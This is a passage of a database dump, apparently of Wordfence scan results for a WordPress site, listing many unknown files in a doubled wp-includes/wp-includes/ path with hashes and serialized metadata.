distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/Requests/Exception.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33593,1631564673,1631564673,'new','knownfile',75,'e9d9cdcc307f4d131e9cee4285b3a772','e9ee5b82919f29507647b0158030afb3','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Hooker.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/Requests/Hooker.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33594,1631564673,1631564673,'new','knownfile',75,'677552f150d461dc34dfce7ba5228d70','1370de52264fb2a746a2c8869a62ef21','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Hooks.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/Requests/Hooks.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33595,1631564673,1631564673,'new','knownfile',75,'94531c3a5744a6bfbb49b1970367f79c','beef5feea8837cde7d667085fed1d6bb','Unknown file in WordPress core: wp-includes/wp-includes/Requests/IDNAEncoder.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/Requests/IDNAEncoder.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33596,1631564673,1631564673,'new','knownfile',75,'a2eca4164f7ecd37cac65dddb4160383','4c800400613773f1c22044feac6509ae','Unknown file in WordPress core: wp-includes/wp-includes/Requests/IPv6.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/Requests/IPv6.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33597,1631564673,1631564673,'new','knownfile',75,'e55182164c460c76c273640ec4d08ba2','9517fcafa0f02fea210c8a9ef202d718','Unknown file in WordPress core: wp-includes/wp-includes/Requests/IRI.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/Requests/IRI.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33598,1631564673,1631564673,'new','knownfile',75,'184c7011b79c6322fae1cdad2838bc54','867bded4d637ee40bd416fd002dbc569','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Proxy/HTTP.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/Requests/Proxy/HTTP.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33599,1631564673,1631564673,'new','knownfile',75,'31c6c464d7122689f9fba2cd1ba2c081','43f3426f81b8c22f5e90ff8f2dec2ab0','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Proxy.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/Requests/Proxy.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33600,1631564673,1631564673,'new','knownfile',75,'497be5cdacada5c0c83de395af2362f7','76307eb98ae8cf38a611d3bc9dc1b070','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Response/Headers.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/Requests/Response/Headers.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33601,1631564673,1631564673,'new','knownfile',75,'c715315caf5b080b891d2451bf70f344','a0aea1ea2cff278da77fed5049077571','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Response.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/Requests/Response.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33602,1631564673,1631564673,'new','knownfile',75,'3ac60fd945ba48fc33f692aaf9bbe3ff','0c00899b148383fbfdd3775b155d49b0','Unknown file in WordPress core: wp-includes/wp-includes/Requests/SSL.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/Requests/SSL.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33603,1631564673,1631564673,'new','knownfile',75,'6dbc673f2b55742e57ca302948647217','fc0b6c6288ec20582e6a02fae050c927','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Session.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/Requests/Session.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33604,1631564673,1631564673,'new','knownfile',75,'7cf764a1539eed73f91190ddebc7b342','40c015be4d8ac8444997c37a5ae7062e','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Transport/cURL.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/Requests/Transport/cURL.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33605,1631564673,1631564673,'new','knownfile',75,'d167e19414a675159fa4f1a9eb56cd87','1d3b5eac537e71755f78ff45b1006146','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Transport/fsockopen.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/Requests/Transport/fsockopen.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33606,1631564673,1631564673,'new','knownfile',75,'2669bf274ceeb8ee757d0dcd03b76b17','adcbc7c278cad25bb50e174b7d56cd1c','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Transport.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/Requests/Transport.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33607,1631564673,1631564673,'new','knownfile',75,'f8d4fd848215e2433ea89b68c5e2ac0f','4132cf45f4bd1334ca300f0db89f5e64','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Utility/CaseInsensitiveDictionary.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/Requests/Utility/CaseInsensitiveDictionary.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33608,1631564673,1631564673,'new','knownfile',75,'529f1f94c87717786deb2c199fc75aab','2129dfd59748f94af1b6eccd68de18d0','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Utility/FilteredIterator.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/Requests/Utility/FilteredIterator.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33609,1631564673,1631564673,'new','knownfile',75,'5417828d77787c71c54d44524713b31b','9fe2dba15eff3e0e654cdd1caf1c0b9e','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Author.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/SimplePie/Author.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33610,1631564673,1631564673,'new','knownfile',75,'bba7c78c60af0f910edf1154da216f24','0a96e3d9e1b99b5d47894b34321ac1c9','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Cache/Base.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/SimplePie/Cache/Base.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33611,1631564673,1631564673,'new','knownfile',75,'8d78aa6d4ee1052cc7a9b22abcef40bc','7b7b50fec0ba3a9b2d08de4296ee56ab','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Cache/DB.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/SimplePie/Cache/DB.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33612,1631564673,1631564673,'new','knownfile',75,'432f1094c247cf8e76e8d2ce415a01b0','9a00be112eab76826cb13338cfdfb3f4','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Cache/File.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/SimplePie/Cache/File.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33613,1631564673,1631564673,'new','knownfile',75,'096c56159bb5a4737ae42b8a61ac12e2','74855bbb42483b4035615b58b042dd14','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Cache/Memcache.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/SimplePie/Cache/Memcache.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33614,1631564673,1631564673,'new','knownfile',75,'ad5350270ded243b3f4fccedfb07c34f','1c93ebbae58aedb358bf8d7f388243ca','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Cache/Memcached.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/SimplePie/Cache/Memcached.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33615,1631564674,1631564674,'new','knownfile',75,'b07bba847b35a3afb9f5d643289e3e65','0b9d7efb460d7abd36a22b1d434a1e4f','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Cache/MySQL.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/SimplePie/Cache/MySQL.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33616,1631564674,1631564674,'new','knownfile',75,'9588545ef446a1aefcc2df5338ce31b0','f8e756175b18f5f7153b7656ce137b07','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Cache/Redis.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/SimplePie/Cache/Redis.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33617,1631564674,1631564674,'new','knownfile',75,'fe4642dbb4ef9c4bd6623fb71181cf5e','7c7079e733fc6b0fe4a2c001231c3f4e','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Cache.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/SimplePie/Cache.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33618,1631564674,1631564674,'new','knownfile',75,'327b0e72c588093fc4f6bc64cd392fdd','d396818e9e816ebfc296ddb635f559da','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Caption.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/SimplePie/Caption.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33619,1631564674,1631564674,'new','knownfile',75,'8fe246064f634c1e28bd99d5852293c1','6ac922cfd544c9b2c99f67127bf9040c','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Category.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/SimplePie/Category.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33620,1631564674,1631564674,'new','knownfile',75,'fe8711f1270c860808f597ff05cd246b','3fa9ebaf37ad2b5b16a940ce19645db3','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Content/Type/Sniffer.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/SimplePie/Content/Type/Sniffer.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33621,1631564674,1631564674,'new','knownfile',75,'a73d6a531351746d007770ddbe46d9ac','b8ab9752991bc5d6ff6dfbdd5047b046','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Copyright.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/SimplePie/Copyright.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33622,1631564674,1631564674,'new','knownfile',75,'fbbb06c718dd60200a7c5499ecc78b21','30d363ad260e7bdb1a253f6feed31890','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Core.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/SimplePie/Core.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33623,1631564674,1631564674,'new','knownfile',75,'e9c242eb23dbb482c1d7d22154fa4d92','1988eef491639aae938b5415e7913ac9','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Credit.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/SimplePie/Credit.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33624,1631564674,1631564674,'new','knownfile',75,'3db5206bcae2174ca74104f0be707459','e29c8fbdadf6792818db5969f0aa4743','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Decode/HTML/Entities.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/SimplePie/Decode/HTML/Entities.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33625,1631564674,1631564674,'new','knownfile',75,'cdeffbe897bdfb8de21f818e18d84fcb','a4e666482e9a47a5121382554c895aeb','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Enclosure.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/SimplePie/Enclosure.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33626,1631564674,1631564674,'new','knownfile',75,'4b87a412f4eb274fb3e95ce15137ce4f','12cc4d315b0a0379b96f0bf6bf1835fe','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Exception.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/SimplePie/Exception.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33627,1631564674,1631564674,'new','knownfile',75,'368837e91b585b9b7e691d571716329b','28cbf0d70750acc706913be178160113','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/File.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/SimplePie/File.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33628,1631564674,1631564674,'new','knownfile',75,'d97fca70829b0fa569e9196a321b9a28','9a72f532cdea9a1d7b33ecec82336502','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/HTTP/Parser.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/SimplePie/HTTP/Parser.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33629,1631564675,1631564675,'new','knownfile',75,'bd569680b52e9265d3ac7931ac0a95c0','bb1917f95eef0679069248799a8cbc79','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/IRI.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/SimplePie/IRI.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33630,1631564675,1631564675,'new','knownfile',75,'e931abb7c6db0033d4a178c117910620','9c50d6af1d57b1dcc804b2f287a8017c','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Item.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/SimplePie/Item.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33631,1631564675,1631564675,'new','knownfile',75,'51931f40dd601e83c004756d3c8eb47e','58e6e0d5fa311bd1ded0e115816638c4','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Locator.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/SimplePie/Locator.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33632,1631564675,1631564675,'new','knownfile',75,'c738b5940fdbe5470e1fe38199ed67ce','d37bbd656c4a0530f6f3a0ba50ad4ad6','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Misc.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a 